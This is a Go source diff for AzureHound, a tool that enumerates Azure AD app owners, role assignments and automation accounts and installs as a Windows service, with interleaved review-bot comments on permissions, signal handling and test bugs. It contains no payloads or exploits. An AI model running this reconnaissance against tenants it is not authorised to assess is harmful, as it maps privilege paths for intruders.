Delay: 60 * time.Second}, + } + ) + + if err := configureService(); err != nil { + exit(fmt.Errorf("failed to configure service: %w", err)) + } else if err := installService(constants.DisplayName, config, recoveryActions); err != nil { + exit(fmt.Errorf("failed to install service: %w", err)) + } +} 
+ +func configureService() error { + var ( + configDir = config.SystemConfigDirs()[0] + sysConfig = filepath.Join(configDir, "config.json") + userConfig = config.ConfigFile.Value().(string) + ) + + if err := os.MkdirAll(configDir, os.ModePerm); err != nil { + return err + } + + // Confirm use of existing service config + if shouldUseConfig(sysConfig) { + return nil + } + + // Confirm use of existing user config + if shouldUseConfig(userConfig) { + return copyFile(userConfig, sysConfig) + } + + config.ConfigFile.Set(sysConfig) + return configure() +} + +func shouldUseConfig(config string) bool { + if _, err := os.Stat(config); err != nil { + return false + } else { + fmt.Fprintf(os.Stderr, "Detected configuration at %s.\n", config) + return confirm("Use these settings to configure the service", true) + } +} + +func copyFile(src, dest string) error { + if srcFile, err := os.Open(src); err != nil { + return err + } else if destFile, err := os.Create(dest); err != nil { + return err + } else { + defer srcFile.Close() + defer destFile.Close() + if _, err := io.Copy(destFile, srcFile); err != nil { + return err + } + } + return nil +} + +func installService(name string, config mgr.Config, recoveryActions []mgr.RecoveryAction, args ...string) error { + if exe, err := getExePath(); err != nil { + return err + } else if wsm, err := mgr.Connect(); err != nil { + return err + } else { + defer wsm.Disconnect() + + if err := createService(wsm, name, exe, config, recoveryActions, args...); err != nil { + return err + } else { + return nil + } + } +} + +func createService(wsm *mgr.Mgr, name string, exe string, config mgr.Config, recoveryActions []mgr.RecoveryAction, args ...string) error { + if service, err := wsm.OpenService(name); err == nil { + service.Close() + return fmt.Errorf("service %s already exists", name) + } else if service, err := wsm.CreateService(name, exe, config, args...); err != nil { + return err + } else { + defer service.Close() + + if err := 
eventlog.InstallAsEventCreate(name, eventlog.Error|eventlog.Warning|eventlog.Info); err != nil { + service.Delete() + return fmt.Errorf("failed to add %s to event log: %w", name, err) + } + + if recoveryActions != nil { + if err := service.SetRecoveryActions(recoveryActions, 60); err != nil { + service.Delete() + return fmt.Errorf("failed to set recovery actions: %w", err) + } + } + + return nil + } +} diff --git a/cmd/list-app-owners.go b/cmd/list-app-owners.go new file mode 100644 index 0000000..c155d82 --- /dev/null +++ b/cmd/list-app-owners.go 
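Review bot: In `configureService`, `copyFile(userConfig, sysConfig)` writes the user's configuration into the system config directory with `os.Create`, and the directory is made with `os.MkdirAll(configDir, os.ModePerm)`; Go on Windows largely ignores these mode bits, so the copy ends up with whatever ACL `configDir` inherits. If the configuration holds the tenant credentials that `configure` prompts for (not visible in this hunk), other local accounts may be able to read them, so the installer should set an explicit ACL on `configDir`, limited to the service account and administrators, before anything is written there. Separately, `copyFile` leaks `srcFile` when `os.Create` fails and drops the error from `destFile.Close()`; registering `defer srcFile.Close()` right after `os.Open` succeeds and returning `destFile.Close()` on the success path fixes both. `config.SystemConfigDirs()[0]` is also indexed without a length check.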
@@ -0,0 +1,116 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listAppOwnersCmd)
+}
+
+var listAppOwnersCmd = &cobra.Command{
+ Use: "app-owners",
+ Long: "Lists Azure AD App Owners",
+ Run: listAppOwnersCmdImpl,
+ SilenceUsage: true,
+}
+
+func listAppOwnersCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure app owners...")
+ start := time.Now()
+ stream := listAppOwners(ctx, azClient, listApps(ctx, azClient))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listAppOwners(ctx context.Context, client client.AzureClient, apps <-chan azureWrapper[models.App]) <-chan azureWrapper[models.AppOwners] {
+ var (
+ out = make(chan azureWrapper[models.AppOwners])
+ streams = pipeline.Demux(ctx.Done(), apps, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ params = query.GraphParams{}
+ )
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for app := range stream {
+ var (
+ data = models.AppOwners{
+ AppId: app.Data.AppId,
+ }
+ count = 0
+ )
+ for item := range client.ListAzureADAppOwners(ctx, app.Data.Id, params) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing owners for this app", "appId", app.Data.AppId)
+ } else {
+ appOwner := models.AppOwner{
+ Owner: item.Ok,
+ AppId: app.Data.Id,
+ }
+ log.V(2).Info("found app owner", "appOwner", appOwner)
+ count++
+ data.Owners = append(data.Owners, appOwner)
+ }
+ }
+
+ if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper(
+ enums.KindAZAppOwner,
+ data,
+ )); !ok {
+ return
+ }
+ log.V(1).Info("finished listing app owners", "appId", app.Data.AppId, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all app owners")
+ }()
+
+ return out
+}
diff --git a/cmd/list-app-owners_test.go b/cmd/list-app-owners_test.go
new file mode 100644
index 0000000..978b7a8
--- /dev/null
+++ b/cmd/list-app-owners_test.go
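Review bot: `signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)` in `listAppOwnersCmdImpl` registers `os.Kill`, which a process cannot trap, and leaves SIGTERM unhandled, so an ordinary termination request ends the process without running `gracefulShutdown(stop)`. Use `signal.NotifyContext(cmd.Context(), os.Interrupt, syscall.SIGTERM)` and add `"syscall"` to the import block. The same call appears in the `...Impl` functions of list-app-role-assignments.go, list-apps.go, list-automation-account-role-assignments.go, list-automation-accounts.go, list-azure-ad.go and list-azure-rm.go in this patch.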
@@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListAppOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockAppsChannel := make(chan azureWrapper[models.App]) + mockAppOwnerChannel := make(chan client.AzureResult[json.RawMessage]) + mockAppOwnerChannel2 := make(chan client.AzureResult[json.RawMessage]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADAppOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockAppOwnerChannel).Times(1) + mockClient.EXPECT().ListAzureADAppOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockAppOwnerChannel2).Times(1) + channel := listAppOwners(ctx, mockClient, mockAppsChannel) + + go func() { + defer 
close(mockAppsChannel) + mockAppsChannel <- NewAzureWrapper(enums.KindAZApp, models.App{}) + mockAppsChannel <- NewAzureWrapper(enums.KindAZApp, models.App{}) + }() + go func() { + defer close(mockAppOwnerChannel) + mockAppOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockAppOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + }() + go func() { + defer close(mockAppOwnerChannel2) + mockAppOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockAppOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.Owners) != 2 { + t.Errorf("got %v, want %v", len(result.Data.Owners), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.Owners) != 1 { + t.Errorf("got %v, want %v", len(result.Data.Owners), 2) + } +} diff --git a/cmd/list-app-role-assignments.go b/cmd/list-app-role-assignments.go new file mode 100644 index 0000000..675df4e --- /dev/null +++ b/cmd/list-app-role-assignments.go 
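Review bot: The second assertion in `TestListAppOwners` checks `len(result.Data.Owners) != 1` but reports `want 2`, so a failure prints the wrong expectation; the line should read `t.Errorf("got %v, want %v", len(result.Data.Owners), 1)`. The test also assumes the two-owner result arrives first, which looks like it depends on `config.ColStreamCount` and on goroutine scheduling inside `listAppOwners`; collecting both results and comparing the set of owner counts would make it order-independent.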
@@ -0,0 +1,131 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAppRoleAssignmentsCmd) +} + +var listAppRoleAssignmentsCmd = &cobra.Command{ + Use: "app-role-assignments", + Long: "Lists Azure Active Directory App Role Assignments", + Run: listAppRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listAppRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory app role assignments...") + start := time.Now() + servicePrincipals := listServicePrincipals(ctx, azClient) + stream := listAppRoleAssignments(ctx, azClient, servicePrincipals) + 
panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAppRoleAssignments(ctx context.Context, client client.AzureClient, servicePrincipals <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + filteredSPs = make(chan models.ServicePrincipal) + streams = pipeline.Demux(ctx.Done(), filteredSPs, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(filteredSPs) + + for result := range pipeline.OrDone(ctx.Done(), servicePrincipals) { + if servicePrincipal, ok := result.(AzureWrapper).Data.(models.ServicePrincipal); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating app role assignments", "result", result) + return + } else { + if len(servicePrincipal.AppRoles) != 0 { + if ok := pipeline.Send(ctx.Done(), filteredSPs, servicePrincipal); !ok { + return + } + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for servicePrincipal := range stream { + var ( + count = 0 + ) + for item := range client.ListAzureADAppRoleAssignments(ctx, servicePrincipal.Id, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing app role assignments for this service principal", "servicePrincipalId", servicePrincipal) + } else { + log.V(2).Info("found app role assignment", "roleAssignments", item) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZAppRoleAssignment, + Data: models.AppRoleAssignment{ + AppRoleAssignment: item.Ok, + AppId: servicePrincipal.AppId, + TenantId: client.TenantInfo().TenantId, + }, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing app role assignments", "appId", servicePrincipal.AppId, 
"servicePrincipalId", servicePrincipal.Id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all app role assignments") + }() + + return out +} diff --git a/cmd/list-apps.go b/cmd/list-apps.go new file mode 100644 index 0000000..aabec3e --- /dev/null +++ b/cmd/list-apps.go 
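Review bot: In `listAppRoleAssignments`, `result.(AzureWrapper).Data.(models.ServicePrincipal)` guards only the inner assertion; the outer `result.(AzureWrapper)` is the single-value form and panics when the channel carries any other type, so the `failed type assertion` branch is never reached for that case and the value is left to `panicrecovery.PanicRecovery()`. Split it into `wrapper, ok := result.(AzureWrapper)` followed by `servicePrincipal, ok := wrapper.Data.(models.ServicePrincipal)`, logging and returning on either failure. The same expression shape is used in list-automation-account-role-assignments.go and list-automation-accounts.go. The error log in the worker loop also passes the whole `servicePrincipal` under the key `"servicePrincipalId"`, where `servicePrincipal.Id` is what the key promises.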
@@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAppsCmd) +} + +var listAppsCmd = &cobra.Command{ + Use: "apps", + Long: "Lists Azure Active Directory Applications", + Run: listAppsCmdImpl, + SilenceUsage: true, +} + +func listAppsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory applications...") + start := time.Now() + stream := listApps(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listApps(ctx context.Context, client client.AzureClient) <-chan azureWrapper[models.App] { + out 
:= make(chan azureWrapper[models.App]) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureADApps(ctx, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing applications") + return + } else { + log.V(2).Info("found application", "app", item) + count++ + if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper( + enums.KindAZApp, + models.App{ + Application: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + }, + )); !ok { + return + } + } + } + log.Info("finished listing all apps", "count", count) + }() + + return out +} diff --git a/cmd/list-apps_test.go b/cmd/list-apps_test.go new file mode 100644 index 0000000..136d8f0 --- /dev/null +++ b/cmd/list-apps_test.go 
@@ -0,0 +1,65 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListApps(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+ mockChannel := make(chan client.AzureResult[azure.Application])
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureADApps(gomock.Any(), gomock.Any()).Return(mockChannel)
+
+ go func() {
+ defer close(mockChannel)
+ mockChannel <- client.AzureResult[azure.Application]{
+ Ok: azure.Application{},
+ }
+ mockChannel <- client.AzureResult[azure.Application]{
+ Error: mockError,
+ }
+ mockChannel <- client.AzureResult[azure.Application]{
+ Ok: azure.Application{},
+ }
+ }()
+
+ channel := listApps(ctx, mockClient)
+ <-channel
+ if _, ok := <-channel; ok {
+ t.Error("expected channel to close from an error result but it did not")
+ }
+}
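Review bot: The producer goroutine in `TestListApps` never finishes: `listApps` returns on the error item, so the third send on the unbuffered `mockChannel` blocks forever and the deferred `close(mockChannel)` never runs. Give the channel room for the fixtures, `mockChannel := make(chan client.AzureResult[azure.Application], 3)`, so the goroutine can exit. The first `<-channel` also discards its result without checking that a value was actually received.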
diff --git a/cmd/list-automation-account-role-assignments.go b/cmd/list-automation-account-role-assignments.go
new file mode 100644
index 0000000..8627b22
--- /dev/null
+++ b/cmd/list-automation-account-role-assignments.go
@@ -0,0 +1,136 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAutomationAccountRoleAssignment) +} + +var listAutomationAccountRoleAssignment = &cobra.Command{ + Use: "automation-account-role-assignments", + Long: "Lists Azure Automation Account Role Assignments", + Run: listAutomationAccountRoleAssignmentImpl, + SilenceUsage: true, +} + +func listAutomationAccountRoleAssignmentImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure automation account role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listAutomationAccountRoleAssignments(ctx, azClient, listAutomationAccounts(ctx, azClient, 
subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAutomationAccountRoleAssignments(ctx context.Context, client client.AzureClient, automationAccounts <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), automationAccounts) { + if automationAccount, ok := result.(AzureWrapper).Data.(models.AutomationAccount); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating automation account role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, automationAccount.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + automationAccountRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this automation account", "automationAccountId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + automationAccountRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("found automation account role assignment", "automationAccountRoleAssignment", automationAccountRoleAssignment) + count++ + automationAccountRoleAssignments.RoleAssignments = append(automationAccountRoleAssignments.RoleAssignments, 
automationAccountRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZAutomationAccountRoleAssignment, + Data: automationAccountRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing automation account role assignments", "automationAccountId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all automation account role assignments") + }() + + return out +} diff --git a/cmd/list-automation-accounts.go b/cmd/list-automation-accounts.go new file mode 100644 index 0000000..736650a --- /dev/null +++ b/cmd/list-automation-accounts.go 
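Review bot: When `client.ListRoleAssignmentsForResource` yields an item with `item.Error` set, the worker loop in `listAutomationAccountRoleAssignments` only logs it and still sends `automationAccountRoleAssignments` downstream, so a consumer cannot tell a complete role-assignment list from one that may have been cut short by an API error. For access-control data that gap matters, because an assignment missing from the output reads as "not granted". Consider recording the failure on the emitted object or skipping the send for that `id`, and state the chosen behaviour above the inner loop, e.g. `// A failed request leaves RoleAssignments incomplete; the error is only logged.` `listAppOwners` in list-app-owners.go follows the same pattern.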
@@ -0,0 +1,127 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAutomationAccountsCmd) +} + +var listAutomationAccountsCmd = &cobra.Command{ + Use: "automation-accounts", + Long: "Lists Azure Automation Accounts", + Run: listAutomationAccountsCmdImpl, + SilenceUsage: true, +} + +func listAutomationAccountsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure automation accounts...") + start := time.Now() + stream := listAutomationAccounts(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", 
duration.String()) +} + +func listAutomationAccounts(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating automation accounts", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureAutomationAccounts(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing automation accounts for this subscription", "subscriptionId", id) + } else { + resourceGroupId := item.Ok.ResourceGroupId() + automationAccount := models.AutomationAccount{ + AutomationAccount: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: resourceGroupId, + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found automation account", "automationAccount", automationAccount) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZAutomationAccount, + Data: automationAccount, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing automation accounts", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all automation accounts") + }() + + return out +} 
diff --git a/cmd/list-azure-ad.go b/cmd/list-azure-ad.go
new file mode 100644
index 0000000..bca217d
--- /dev/null
+++ b/cmd/list-azure-ad.go
@@ -0,0 +1,130 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAzureADCmd) +} + +var listAzureADCmd = &cobra.Command{ + Use: "az-ad", + Long: "Lists All Azure AD Entities", + PersistentPreRunE: persistentPreRunE, + Run: listAzureADCmdImpl, + SilenceUsage: true, +} + +func listAzureADCmdImpl(cmd *cobra.Command, args []string) { + if len(args) > 0 { + exit(fmt.Errorf("unsupported subcommand: %v", args)) + } + + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure ad objects...") + start := time.Now() + stream := listAllAD(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAllAD(ctx context.Context, client client.AzureClient) <-chan interface{} { + var ( + devices = make(chan interface{}) + devices2 = 
